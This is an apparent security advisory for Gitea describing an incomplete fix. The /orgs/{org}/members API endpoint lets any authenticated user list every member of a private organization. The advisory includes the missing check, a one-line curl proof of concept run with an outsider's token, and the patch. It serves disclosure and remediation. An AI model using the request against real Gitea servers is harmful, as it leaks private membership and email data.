GHSA-prr9-9mp4-5gp2: Gitea: Private org member list leaked via /members API endpoint — incomplete fix for PR #38145
Summary
PR #38145 fixed ListPublicMembers and IsPublicMember but missed
ListMembers. Any authenticated user can enumerate ALL members
(not just public ones) of a private organization.
Affected Versions
<= v1.26.4 (latest) and main branch
Root Cause
routers/api/v1/org/member.go — ListMembers():
// Missing check:
if !organization.HasOrgOrUserVisible(ctx,
ctx.Org.Organization.AsUser(), ctx.Doer) {
ctx.APIErrorNotFound()
return
}
Proof of Concept
Setup: privateorg (private), alice = member, bob = outsider
Bob lists ALL members of private org
curl -s "http://gitea/api/v1/orgs/privateorg/members" \
-H "Authorization: token BOB_TOKEN"
Result: HTTP 200
[{"login":"alice","email":"alice@test.com",...}]
Expected: HTTP 404
Note
This is an incomplete fix variant of PR #38145.
That PR fixed public_members endpoints only.
ListMembers (/orgs/{org}/members) remains unpatched.
Fix
Add to ListMembers():
if !organization.HasOrgOrUserVisible(ctx,
ctx.Org.Organization.AsUser(), ctx.Doer) {
ctx.APIErrorNotFound()
return
}
Details
Original advisory: https://github.com/advisories/GHSA-prr9-9mp4-5gp2
Referenced CVEs
| CVE | CSIRTS overview | External |
|---|---|---|
| CVE-2026-58427 | coverage & exploitation status | NVD · CVE.org |
Same CVEs, other sources
How other CERTs, PSIRTs and databases cover the vulnerabilities in this advisory.
- high[NEW] [high] Gitea: Multiple vulnerabilitiescert-bund
More from GitHub Security Advisories
- mediumGHSA-jr6p-8pjj-mfx6: Capsule has an incomplete fix of CVE-2026-22872: TenantResource RawItems and Generators s…2026-07-31
- mediumGHSA-68cj-mvg9-rgm2: Capsule: CapsuleConfiguration NodeMetadata regex fields lack webhook validation, allowing…2026-07-31
- mediumGHSA-ff84-5f28-78qj: re2: Out-of-bounds heap read in `exec`/`test`/`match` via attacker-influenced `lastIndex`…2026-07-31
- mediumGHSA-6hxr-mr5r-9836: re2: Global `String.prototype.match` with an empty-matchable pattern never advances → inf…2026-07-31
- mediumGHSA-x83g-979r-f5fh: Sylius Mollie Plugin has unauthenticated IDOR that leaks order token and customer PII2026-07-31